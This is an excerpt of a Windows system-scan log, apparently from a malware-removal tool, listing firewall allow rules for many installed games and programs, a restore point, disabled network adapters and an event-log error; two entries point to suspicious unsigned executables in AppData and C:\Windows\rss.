FirewallRules: [{4AC69300-90CA-4A62-BE4F-52092526E025}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Hammerwatch\editor\HammerEditor.exe () [File not signed]
FirewallRules: [{65C4ED00-8266-45C6-91DB-21526BA28A2D}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Convoy\Convoy.exe () [File not signed]
FirewallRules: [{A2E87605-6C1B-4298-8B00-AB8EE39CB539}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Convoy\Convoy.exe () [File not signed]
FirewallRules: [{0B7BF318-33C7-47DA-A63A-CC90FAA68DB7}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Armello\armello.exe () [File not signed]
FirewallRules: [{C76D77E1-37C9-405E-9F3B-70A58CEF2816}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Armello\armello.exe () [File not signed]
FirewallRules: [{5115D50C-9180-4A20-AE23-19593FC64208}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Clash of Cards\gw.exe (The NWJS Community) [File not signed]
FirewallRules: [{C780FC9A-045A-4F53-98B3-01F7B0B51A60}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Clash of Cards\gw.exe (The NWJS Community) [File not signed]
FirewallRules: [{0B051E14-7506-43FF-8C67-A979B729AA06}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Orcs Must Die 2\build\release\OrcsMustDie2.exe (Robot Entertainment) [File not signed]
FirewallRules: [{932DA492-2C4B-4E7B-890D-471F4E860CC8}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Orcs Must Die 2\build\release\OrcsMustDie2.exe (Robot Entertainment) [File not signed]
FirewallRules: [{3971E978-6169-4102-8F2E-D9614467571C}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Infested Planet\InfestedPlanet.exe (Rocket Bear Games) [File not signed]
FirewallRules: [{8A58E645-A1B8-4DBE-A31E-DCE5C7B7594C}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Infested Planet\InfestedPlanet.exe (Rocket Bear Games) [File not signed]
FirewallRules: [{680B4808-5154-4A37-A2BA-FFC4FB7FF359}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\The Battle for Sector 219\Sector219.exe () [File not signed]
FirewallRules: [{BA7A96FA-8AEA-4DDA-A3FF-6CC4B5FC667E}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\The Battle for Sector 219\Sector219.exe () [File not signed]
FirewallRules: [{0ECDB666-D1D9-4FCD-82FB-0E59C460F0CA}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Templar Battleforce\TemplarBattleforce.exe () [File not signed]
FirewallRules: [{DBC8E5F8-67FA-4D93-A5BD-5B1D9BBDD3E9}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Templar Battleforce\TemplarBattleforce.exe () [File not signed]
FirewallRules: [{37F82374-33CF-4020-ADF2-04A7DEAB5E02}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\CastleCrashers\castle.exe () [File not signed]
FirewallRules: [{BFAA9040-87D9-46AC-923F-39FB2532B193}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\CastleCrashers\castle.exe () [File not signed]
FirewallRules: [{151A915B-EC67-4EE2-878C-3742A3F89E23}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\One Finger Death Punch\One Finger Death Punch.exe (Silver Dollar Games) [File not signed]
FirewallRules: [{44E33752-3C71-47BB-B006-2B883116505F}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\One Finger Death Punch\One Finger Death Punch.exe (Silver Dollar Games) [File not signed]
FirewallRules: [{221C9BB1-8FE0-4A10-9459-C0448E1CBDC9}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Shadowrun Returns\Shadowrun.exe () [File not signed]
FirewallRules: [{17539F41-B614-47F3-A0A6-DE106A6F4A9E}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Shadowrun Returns\Shadowrun.exe () [File not signed]
FirewallRules: [{E0A4F2E9-F2A1-47D4-BFD5-002DA523D70B}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Mythgard\Mythgard.exe () [File not signed]
FirewallRules: [{5FE7558D-FD74-49A9-A526-4E1924EEC2D5}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Mythgard\Mythgard.exe () [File not signed]
FirewallRules: [{95902FFB-FFF1-48B2-8BC8-92B9C90566A7}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Star Crusade CCG\app.exe () [File not signed]
FirewallRules: [{496C5212-D859-42BB-B6F7-757A3A3BD59C}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Star Crusade CCG\app.exe () [File not signed]
FirewallRules: [{40815DE7-2C6E-4B9C-9D19-5A8BA39FC439}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\World of Myths\World of Myths.exe () [File not signed]
FirewallRules: [{7EE70835-EB0B-4ED0-BB7A-B538E2E97685}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\World of Myths\World of Myths.exe () [File not signed]
FirewallRules: [{14DACD0D-BA7E-4A3F-AFD1-568ED138E7EF}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\KARDS\kards.exe (Epic Games, Inc.) [File not signed]
FirewallRules: [{C42D0629-BA97-4B0F-813F-D2B274252A3A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\KARDS\kards.exe (Epic Games, Inc.) [File not signed]
FirewallRules: [{7F493E17-43C0-497C-8595-17C1B43816FA}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Prismata\Prismata.exe () [File not signed]
FirewallRules: [{DFF2484F-1104-400D-9997-91262118B46C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Prismata\Prismata.exe () [File not signed]
FirewallRules: [{01CC5BD2-2EBE-40CB-8549-D52998EFFF35}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Star Realms\StarRealms.exe () [File not signed]
FirewallRules: [{560366D4-C020-46E4-AABA-1ED207FC9CD0}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Star Realms\StarRealms.exe () [File not signed]
FirewallRules: [{3C8E4A52-756E-4B5C-BFE9-6EE7BD7F5CD0}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Endless Sky\EndlessSky.exe () [File not signed]
FirewallRules: [{C2228885-11C9-485E-9CFB-2FAEAACDAAE4}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Endless Sky\EndlessSky.exe () [File not signed]
FirewallRules: [{046FEF29-9DD0-4133-8C27-5B92FE20CFF4}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\OneTrollArmy\OTA.exe () [File not signed]
FirewallRules: [{C080F5AE-C891-445D-9B35-3DE6E479A4F7}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\OneTrollArmy\OTA.exe () [File not signed]
FirewallRules: [{1946CA19-0319-4D5F-832F-01EF435969C4}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\AI War Fleet Command\AIWar.exe () [File not signed]
FirewallRules: [{AB6167F6-9C96-49DB-B732-EAE2D2B14B10}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\AI War Fleet Command\AIWar.exe () [File not signed]
FirewallRules: [{1B2BD8AE-607B-4872-9499-E953029E0B84}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Grim Dawn\x64\Grim Dawn.exe => No File
FirewallRules: [{B4F5A801-3878-468A-A1BA-18887D12603D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Grim Dawn\x64\Grim Dawn.exe => No File
FirewallRules: [{0B570F29-49B0-45A7-B01E-C5FB391766C4}] => (Allow) C:\Riot Games\League of Legends\LeagueClient.exe (Riot Games, Inc. -> Riot Games, Inc.)
FirewallRules: [{CC47BE6D-5A03-4022-B228-0660B482E5BB}] => (Allow) C:\Riot Games\League of Legends\LeagueClient.exe (Riot Games, Inc. -> Riot Games, Inc.)
FirewallRules: [{201DA782-50B1-4C46-AEE1-8F882551B6BD}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\KROSMAGA\Ankama Launcher.exe => No File
FirewallRules: [{2BF2B7E9-497C-43FC-BCD9-4293D45FEA88}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\KROSMAGA\Ankama Launcher.exe => No File
FirewallRules: [{BEB58DE9-F53A-4D6C-9DAE-BFED7C497104}] => (Allow) D:\StAllIns!!\GAMES2!!\Supreme Commander Forged Alliance\Supreme Commander - Forged Alliance\bin\ForgedAlliance.exe => No File
FirewallRules: [{2F91B7E6-97E5-4EB8-9CEC-281BB31729F5}] => (Allow) D:\StAllIns!!\GAMES2!!\Supreme Commander Forged Alliance\Supreme Commander - Forged Alliance\bin\ForgedAlliance.exe => No File
FirewallRules: [{615CA74A-9FA7-435B-A2D3-C5EC5420C160}] => (Allow) D:\StAllIns!!\GAMES2!!\Supreme Commander Forged Alliance\GPGNet\GPG.Multiplayer.Client.exe => No File
FirewallRules: [{CB0031D4-314A-49B9-8448-5C9BBC22064F}] => (Allow) D:\StAllIns!!\GAMES2!!\Supreme Commander Forged Alliance\GPGNet\GPG.Multiplayer.Client.exe => No File
FirewallRules: [{FA89ABF0-B149-4ED7-8F26-EBA86DBD24A3}] => (Allow) D:\StAllIns!!\GAMES2!!\Lord of the Rings!\B4ME I\game.dat => No File
FirewallRules: [{6BB12D78-4F1D-46D4-ADE3-E96E5249B41A}] => (Allow) D:\StAllIns!!\GAMES2!!\Lord of the Rings!\B4ME I\game.dat => No File
FirewallRules: [{C1B26A54-B4E1-4CFD-B9F2-C5D7C3A394FA}] => (Allow) D:\StAllIns!!\GAMES2!!\Lord of the Rings!\B4ME II\game.dat (Electronic Arts Inc.) [File not signed]
FirewallRules: [{05599189-AB1E-4D02-B241-CD1AB13DF523}] => (Allow) D:\StAllIns!!\GAMES2!!\Lord of the Rings!\B4ME II\game.dat (Electronic Arts Inc.) [File not signed]
FirewallRules: [{F7A4F0BB-D213-445F-8539-394FA63A00A5}] => (Allow) D:\StAllIns!!\GAMES2!!\Lord of the Rings!\B4ME II WK\game.dat => No File
FirewallRules: [{38FAC518-FA42-429A-87B5-57E7003673B7}] => (Allow) D:\StAllIns!!\GAMES2!!\Lord of the Rings!\B4ME II WK\game.dat => No File
FirewallRules: [{2425A36D-FB01-4261-A94C-1475F3F9C674}] => (Allow) C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe (AVB Disc Soft, SIA -> Disc Soft Ltd)
FirewallRules: [{834DF7F9-BE4C-4430-A85A-4EED1CA4398A}] => (Allow) C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe (AVB Disc Soft, SIA -> Disc Soft Ltd)
FirewallRules: [{B2A20AE9-3284-4B27-AA38-94139BFF3E22}] => (Allow) C:\Program Files (x86)\Maxthon5\Bin\Maxthon.exe (Maxthon Technology Co, Ltd. -> Maxthon International ltd.)
FirewallRules: [{6B2B4190-0A6F-48D6-BD7A-BF83EEBC19A1}] => (Allow) C:\Program Files (x86)\Maxthon5\Bin\Maxthon.exe (Maxthon Technology Co, Ltd. -> Maxthon International ltd.)
FirewallRules: [{E77BE97B-8759-408C-8900-C78831291A87}] => (Allow) D:\StAllIns!!\GAMES2!!\Lord of the Rings!\B4ME II WRATH!\game.dat (Electronic Arts Inc.) [File not signed]
FirewallRules: [{74D8C814-8020-4F18-A26A-E477866FA0C6}] => (Allow) D:\StAllIns!!\GAMES2!!\Lord of the Rings!\B4ME II WRATH!\game.dat (Electronic Arts Inc.) [File not signed]
FirewallRules: [{8FFD9AFA-A466-4862-BEC2-1B24E38A8641}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Darksiders\DarksidersPC.exe (THQ, Inc. -> Vigil Games)
FirewallRules: [{7F25E922-012B-42FA-BB87-14306AE85585}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Darksiders\DarksidersPC.exe (THQ, Inc. -> Vigil Games)
FirewallRules: [{2FFFC05C-4C08-4F00-AE97-882BEE851EE5}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Grim Dawn\x64\Grim Dawn.exe => No File
FirewallRules: [{B59BF623-940E-4B28-98C6-74D94A78B3AE}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Grim Dawn\x64\Grim Dawn.exe => No File
FirewallRules: [{B3F5CCDE-ACF9-4A79-9BE5-BF89861E21C9}] => (Allow) C:\Program Files (x86)\CheckPoint\ZoneAlarm\vsmon.exe (Check Point Software Technologies Ltd. -> Check Point Software Technologies Ltd.)
FirewallRules: [{7550346A-D8D2-4DB1-8FF2-CF245894347D}] => (Allow) C:\Program Files (x86)\CheckPoint\ZoneAlarm\vsmon.exe (Check Point Software Technologies Ltd. -> Check Point Software Technologies Ltd.)
FirewallRules: [{2F00551D-6B0D-4C9C-AE41-AC65CCEEE6CC}] => (Allow) C:\Program Files (x86)\CheckPoint\ZoneAlarm\vsmon.exe (Check Point Software Technologies Ltd. -> Check Point Software Technologies Ltd.)
FirewallRules: [{C8D71391-7A9C-40F7-9608-48241E7ACB86}] => (Allow) C:\Program Files (x86)\CheckPoint\ZoneAlarm\vsmon.exe (Check Point Software Technologies Ltd. -> Check Point Software Technologies Ltd.)
FirewallRules: [{59502BA6-F6FC-4ED5-8791-5443D71DAEDD}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Alien Swarm Reactive Drop\reactivedrop.exe () [File not signed]
FirewallRules: [{CDB377D6-9EC8-4596-816C-68D49E7B774B}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Alien Swarm Reactive Drop\reactivedrop.exe () [File not signed]
FirewallRules: [{5A4DA2E4-7264-44C5-9385-2487045CAC68}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\DefenseGridTheAwakening\DefenseGrid.exe () [File not signed]
FirewallRules: [{4A181A58-9D9F-4A7B-B1F1-E57027C41383}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\DefenseGridTheAwakening\DefenseGrid.exe () [File not signed]
FirewallRules: [{83CA525F-391C-46F6-B580-4334575BD02E}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\GemCraft Chasing Shadows\GemCraft Chasing Shadows.exe () [File not signed]
FirewallRules: [{B167F0A5-5C4E-4105-BBA0-9A9C1269D41F}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\GemCraft Chasing Shadows\GemCraft Chasing Shadows.exe () [File not signed]
FirewallRules: [{BD254BCD-6A39-4AEC-8763-16713A4EACB5}] => (Allow) C:\Program Files\Waterfox\waterfox.exe (Waterfox Limited -> Waterfox)
FirewallRules: [{38848428-4105-46DB-9185-0853D12AAE1D}] => (Allow) C:\Program Files\Waterfox\waterfox.exe (Waterfox Limited -> Waterfox)
FirewallRules: [{BBCB92A5-D5ED-4833-A9E5-7FD0C01D585D}] => (Allow) E:\StallInGGrade!\STEAM!!\steamapps\common\Company of Heroes Relaunch\RelicCOH.exe (The build server will stamp this field) [File not signed]
FirewallRules: [{E84E2326-CC40-4504-9A65-21F79D0E5D5A}] => (Allow) E:\StallInGGrade!\STEAM!!\steamapps\common\Company of Heroes Relaunch\RelicCOH.exe (The build server will stamp this field) [File not signed]
FirewallRules: [{0F79B5FD-BB84-4C5D-BF12-8FE699C1E9E9}] => (Allow) E:\StallInGGrade!\STEAM!!\steamapps\common\Besiege\Besiege.exe () [File not signed]
FirewallRules: [{4AA5E47F-4A35-455B-B622-919ED0EA2830}] => (Allow) E:\StallInGGrade!\STEAM!!\steamapps\common\Besiege\Besiege.exe () [File not signed]
FirewallRules: [{2CB2B782-F129-474E-B24F-57A6B9F908EE}] => (Allow) E:\StallInGGrade!\STEAM!!\steamapps\common\Anomaly Defenders\ADStandalonePC.exe () [File not signed]
FirewallRules: [{73F2C534-8E16-4826-A914-A58C2C148F01}] => (Allow) E:\StallInGGrade!\STEAM!!\steamapps\common\Anomaly Defenders\ADStandalonePC.exe () [File not signed]
FirewallRules: [{EAA0DE79-1C61-4203-AC48-1D999CAE4396}] => (Allow) E:\StallInGGrade!\STEAM!!\steamapps\common\BrutalLegend\BrutalLegend.exe () [File not signed]
FirewallRules: [{E0ADD498-66E6-41DE-949B-1E6F0BB1CE8D}] => (Allow) E:\StallInGGrade!\STEAM!!\steamapps\common\BrutalLegend\BrutalLegend.exe () [File not signed]
FirewallRules: [{F8A4A07A-6537-405E-8FEB-7684840E3499}] => (Allow) E:\StallInGGrade!\STEAM!!\steamapps\common\Dungeon Defenders\Binaries\Win32\DunDefGame.exe (Trendy Entertainment LLC) [File not signed]
FirewallRules: [{B29EC7D8-302F-442E-940F-1444B3D7A73D}] => (Allow) E:\StallInGGrade!\STEAM!!\steamapps\common\Dungeon Defenders\Binaries\Win32\DunDefGame.exe (Trendy Entertainment LLC) [File not signed]
FirewallRules: [{80BA0B6D-6780-40F0-9FDE-E63AAC4F22B0}] => (Allow) E:\StallInGGrade!\STEAM!!\steamapps\common\Forts\Forts.exe (EarthWork Games Pty Ltd -> )
FirewallRules: [{2C327675-AD6D-489E-AB6D-73CFDDF74A64}] => (Allow) E:\StallInGGrade!\STEAM!!\steamapps\common\Forts\Forts.exe (EarthWork Games Pty Ltd -> )
FirewallRules: [{BA574B0A-3732-4BB6-9A8F-64D99C5FBF8F}] => (Allow) E:\StallInGGrade!\STEAM!!\steamapps\common\FuriousAngels\FuriousAngels.exe () [File not signed]
FirewallRules: [{728CBFA9-FDF5-403A-90B9-B5A8EFAE35AF}] => (Allow) E:\StallInGGrade!\STEAM!!\steamapps\common\FuriousAngels\FuriousAngels.exe () [File not signed]
FirewallRules: [{CCDBF60C-2683-4286-BB12-1885F97AF2EE}] => (Allow) E:\StallInGGrade!\STEAM!!\steamapps\common\GarrysMod\hl2.exe () [File not signed]
FirewallRules: [{2DB62E0A-73E1-4938-BE05-CA950E426389}] => (Allow) E:\StallInGGrade!\STEAM!!\steamapps\common\GarrysMod\hl2.exe () [File not signed]
FirewallRules: [{D2066E8C-2636-4938-A7BE-FB6B6D06F414}] => (Allow) E:\StallInGGrade!\STEAM!!\steamapps\common\Hazardous Space\hzs.exe () [File not signed]
FirewallRules: [{183580FA-C2DD-4494-BE87-94571951AC0F}] => (Allow) E:\StallInGGrade!\STEAM!!\steamapps\common\Hazardous Space\hzs.exe () [File not signed]
FirewallRules: [{BEBE792C-95DF-4241-B979-F5B421B88E9D}] => (Allow) E:\StallInGGrade!\STEAM!!\steamapps\common\High Hell\HIGHHELL.exe () [File not signed]
FirewallRules: [{09EA0DF9-9C9A-48B7-8C5F-53F37BEE78C2}] => (Allow) E:\StallInGGrade!\STEAM!!\steamapps\common\High Hell\HIGHHELL.exe () [File not signed]
FirewallRules: [{EAFBBEE1-0C65-44FE-A94A-09C78A41815F}] => (Allow) E:\StallInGGrade!\STEAM!!\steamapps\common\Magic_Siege_Defender\MagicSiegePC\MagicSiege\Magic Siege.exe () [File not signed]
FirewallRules: [{EDE3B36B-97E7-4414-BD1F-018522353204}] => (Allow) E:\StallInGGrade!\STEAM!!\steamapps\common\Magic_Siege_Defender\MagicSiegePC\MagicSiege\Magic Siege.exe () [File not signed]
FirewallRules: [{AF363FAC-83C3-4065-B6BE-D197C14DA73F}] => (Allow) E:\StallInGGrade!\STEAM!!\steamapps\common\Molten Armor\nw.exe (The NWJS Community) [File not signed]
FirewallRules: [{9D344064-4745-4974-8CDA-18D52A979FB7}] => (Allow) E:\StallInGGrade!\STEAM!!\steamapps\common\Molten Armor\nw.exe (The NWJS Community) [File not signed]
FirewallRules: [{3B594BA3-28D5-4A9E-ABA7-38501D886511}] => (Allow) E:\StallInGGrade!\STEAM!!\steamapps\common\Prime World Defenders\pw_defenders.exe (Nival) [File not signed]
FirewallRules: [{F13273B0-4565-4D5C-B5FE-97ADA18D21C9}] => (Allow) E:\StallInGGrade!\STEAM!!\steamapps\common\Prime World Defenders\pw_defenders.exe (Nival) [File not signed]
FirewallRules: [{D1C994C9-C0D9-4350-B686-132D30B72BC9}] => (Allow) E:\StallInGGrade!\STEAM!!\steamapps\common\Rock 'N' Roll Defense\Rock 'N' Roll Defense.exe (NukGames) [File not signed]
FirewallRules: [{80D73062-7AB7-4D4C-B48B-9A915956B3CD}] => (Allow) E:\StallInGGrade!\STEAM!!\steamapps\common\Rock 'N' Roll Defense\Rock 'N' Roll Defense.exe (NukGames) [File not signed]
FirewallRules: [{F06C5A3B-4E24-464A-B889-945F8BCE0B76}] => (Allow) E:\StallInGGrade!\STEAM!!\steamapps\common\Sanctum\Binaries\Win32\SanctumGame-Win32-Shipping.exe (Coffee Stain Studios AB) [File not signed]
FirewallRules: [{EFD2E86D-D2E5-48D4-8B78-A5DC5B00FE7A}] => (Allow) E:\StallInGGrade!\STEAM!!\steamapps\common\Sanctum\Binaries\Win32\SanctumGame-Win32-Shipping.exe (Coffee Stain Studios AB) [File not signed]
FirewallRules: [{2AF4379F-69D6-490B-9C5A-2CFDFA942F45}] => (Allow) E:\StallInGGrade!\STEAM!!\steamapps\common\Tabletop Simulator\Tabletop Simulator.exe () [File not signed]
FirewallRules: [{86E4DD18-DE57-4F81-85D3-69328360D826}] => (Allow) E:\StallInGGrade!\STEAM!!\steamapps\common\Tabletop Simulator\Tabletop Simulator.exe () [File not signed]
FirewallRules: [{CC0A39B4-D5B8-4027-9F16-5A2F4D202CCE}] => (Allow) E:\StallInGGrade!\STEAM!!\steamapps\common\Torchlight II\ModLauncher.exe (Runic Games, Inc. -> Runic Games, Inc.)
FirewallRules: [{645A77A6-9DCA-4031-A66C-A12A0C3376B8}] => (Allow) E:\StallInGGrade!\STEAM!!\steamapps\common\Torchlight II\ModLauncher.exe (Runic Games, Inc. -> Runic Games, Inc.)
FirewallRules: [{5B73CA51-070F-4185-8775-D0217DEBB933}] => (Allow) C:\Program Files (x86)\MaskVPN\mask_svc.exe (Global Media (Thailand) Co., Ltd -> Global Media (Thailand) Co., Ltd)
FirewallRules: [{B20DC988-5FB6-47F2-B3DA-FDF902B1FBD2}] => (Allow) C:\Program Files (x86)\MaskVPN\MaskVPN.exe (Global Media (Thailand) Co., Ltd -> Global Media (Thailand) Co., Ltd)
FirewallRules: [{DE9270B5-76B5-44CC-86E1-81A52400DF7F}] => (Allow) C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe (Global Media (Thailand) Co., Ltd -> Global Media (Thailand) Co., Ltd)
FirewallRules: [{EDB96137-AAEB-44EF-AF90-BEFC164DCF86}] => (Allow) C:\Program Files (x86)\MaskVPN\tunnle.exe (Global Media (Thailand) Co., Ltd -> Global Media (Thailand) Co., Ltd)
FirewallRules: [{E2258A92-4A59-4D62-8640-025D049D1D2A}] => (Allow) E:\StallInGGrade!\PRINCE OF PERSIA!\Prince of Persia The Forgotten Sands\Prince of Persia.exe (UBISOFT ENTERTAINMENT INC. -> )
FirewallRules: [{AF6C53CB-4C4B-4C64-849C-3EDEDBD5E1B5}] => (Allow) E:\StallInGGrade!\PRINCE OF PERSIA!\Prince of Persia The Forgotten Sands\Prince of Persia.exe (UBISOFT ENTERTAINMENT INC. -> )
FirewallRules: [{208093F8-5592-420C-9BDD-260467650A7B}] => (Allow) E:\StallInGGrade!\PRINCE OF PERSIA!\Prince of Persia The Forgotten Sands\GameSettings.exe (UBISOFT ENTERTAINMENT INC. -> Ubisoft)
FirewallRules: [{FAC05A24-3B88-4927-8749-4972359F6E6B}] => (Allow) E:\StallInGGrade!\PRINCE OF PERSIA!\Prince of Persia The Forgotten Sands\GameSettings.exe (UBISOFT ENTERTAINMENT INC. -> Ubisoft)
FirewallRules: [{7A4B9AE4-7936-4299-AC58-0E349CE2269F}] => (Allow) E:\StallInGGrade!\PRINCE OF PERSIA!\Prince of Persia The Forgotten Sands\gu.exe (UBISOFT ENTERTAINMENT INC. -> Ubisoft)
FirewallRules: [{218B5A0A-7D89-48F8-A3C9-55823826C8E8}] => (Allow) E:\StallInGGrade!\PRINCE OF PERSIA!\Prince of Persia The Forgotten Sands\gu.exe (UBISOFT ENTERTAINMENT INC. -> Ubisoft)
FirewallRules: [{3D29414C-3F1B-498B-B42D-32F7DD50C2B0}] => (Allow) E:\StallInGGrade!\PRINCE OF PERSIA!\Prince of Persia The Forgotten Sands\UPlayBrowser.exe (UBISOFT ENTERTAINMENT INC. -> Ubisoft Entertainment)
FirewallRules: [{82316F00-2278-4923-93F5-20EB87B9F632}] => (Allow) E:\StallInGGrade!\PRINCE OF PERSIA!\Prince of Persia The Forgotten Sands\UPlayBrowser.exe (UBISOFT ENTERTAINMENT INC. -> Ubisoft Entertainment)
FirewallRules: [{BF9AA41B-9115-48CB-8FEA-3DB790EDD22F}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\UbisoftGameLauncher.exe (Ubisoft Massive -> Ubisoft)
FirewallRules: [{E814EE02-D197-4D98-9A72-01F61F727AC4}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\UbisoftGameLauncher.exe (Ubisoft Massive -> Ubisoft)
FirewallRules: [{9AA97FD0-55F1-4DE4-8B20-41936E7DB7A4}] => (Allow) E:\StallInGGrade!\WARHAMMER!\Warhammer.exe => No File
FirewallRules: [{2285BE7C-7364-443A-9EC3-49ED213640EC}] => (Allow) E:\StallInGGrade!\WARHAMMER!\Warhammer.exe => No File
FirewallRules: [{4FCF4B7A-144B-4F22-960E-BC38883303C9}] => (Allow) E:\StallInGGrade!\WARHAMMER!\Mark of Chaos+Battle March!\Warhammer.exe (Black Hole Entertainment) [File not signed]
FirewallRules: [{3DBAB9FD-7A3D-4EDD-A093-E886EE6BB5DE}] => (Allow) E:\StallInGGrade!\WARHAMMER!\Mark of Chaos+Battle March!\Warhammer.exe (Black Hole Entertainment) [File not signed]
FirewallRules: [{2E2C7DCC-95DB-4153-A521-0FF90AB9F282}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\SlayTheSpire\jre\bin\javaw.exe
FirewallRules: [{4B006AD0-3710-49A0-97B5-B5364172E169}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\SlayTheSpire\jre\bin\javaw.exe
FirewallRules: [{0151E142-6638-4F2D-8B02-0E1D5FEE1576}] => (Allow) E:\StallInGGrade!\STEAM!!\steamapps\common\Legion TD 2\Legion TD 2.exe () [File not signed]
FirewallRules: [{6F9778F0-7DC4-414A-9522-180FA00A34C6}] => (Allow) E:\StallInGGrade!\STEAM!!\steamapps\common\Legion TD 2\Legion TD 2.exe () [File not signed]
FirewallRules: [{F0F14749-6559-4C3F-9EF0-BEE1ECEA847A}] => (Allow) E:\StallInGGrade!\GAMES!!\FIFA 14\Game\fifa14.exe (Electronic Arts -> Electronic Arts)
FirewallRules: [{4B568302-B65F-4A32-8E59-C6BF2215BB24}] => (Allow) E:\StallInGGrade!\GAMES!!\FIFA 14\Game\fifa14.exe (Electronic Arts -> Electronic Arts)
FirewallRules: [{D3FE1DA8-F3A7-44D6-901B-46441C68A6A3}] => (Allow) E:\StallInGGrade!\NEED FOR SPEED!\Need for Speed The Run\Need For Speed The Run.exe (Electronic Arts -> Electronic Arts, Inc.)
FirewallRules: [{D41B15B4-21BA-4A10-A6C6-23E38F3D79F7}] => (Allow) E:\StallInGGrade!\NEED FOR SPEED!\Need for Speed The Run\Need For Speed The Run.exe (Electronic Arts -> Electronic Arts, Inc.)
FirewallRules: [{BEA5E3FA-C2CC-4C60-8E29-8206C5CC7234}] => (Allow) C:\Users\Ohm\AppData\Roaming\3d03298b616c\3d03298b616c.exe () [File not signed]
FirewallRules: [{2E2BB14A-F1C1-4C1C-9DAE-A063E6C1598B}] => (Allow) C:\Windows\rss\csrss.exe () [File not signed]
FirewallRules: [{9062FF98-2D76-45D9-B1FF-2B53161FBCAB}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\KROSMAGA\Ankama Launcher [steam].exe (ANKAMA GAMES -> Ankama)
FirewallRules: [{9CFED1E8-E7B8-45D6-9C79-2AD797B84000}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\KROSMAGA\Ankama Launcher [steam].exe (ANKAMA GAMES -> Ankama)
FirewallRules: [{BE49F651-79E5-4CB4-AB52-A19BD4518069}] => (Allow) C:\Program Files (x86)\BraveSoftware\Brave-Browser\Application\brave.exe (Brave Software, Inc. -> Brave Software, Inc.)

==================== Restore Points =========================

29-09-2020 16:10:08 Scheduled Checkpoint

==================== Faulty Device Manager Devices ============

Name: Realtek PCIe GBE Family Controller
Description: Realtek PCIe GBE Family Controller
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Realtek
Service: RTL8167
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: TAP-ProtonVPN Windows Adapter V9
Description: TAP-ProtonVPN Windows Adapter V9
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: TAP-ProtonVPN Windows Provider V9
Service: tapprotonvpn
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: TAP-Windows Adapter V9
Description: TAP-Windows Adapter V9
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: TAP-Windows Provider V9
Service: tap0901
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.


==================== Event log errors: ========================

Application errors:
==================
Error: (10/01/2020 01:13:43 AM) (Source: WinMgmt) (EventID: 10) (User: )
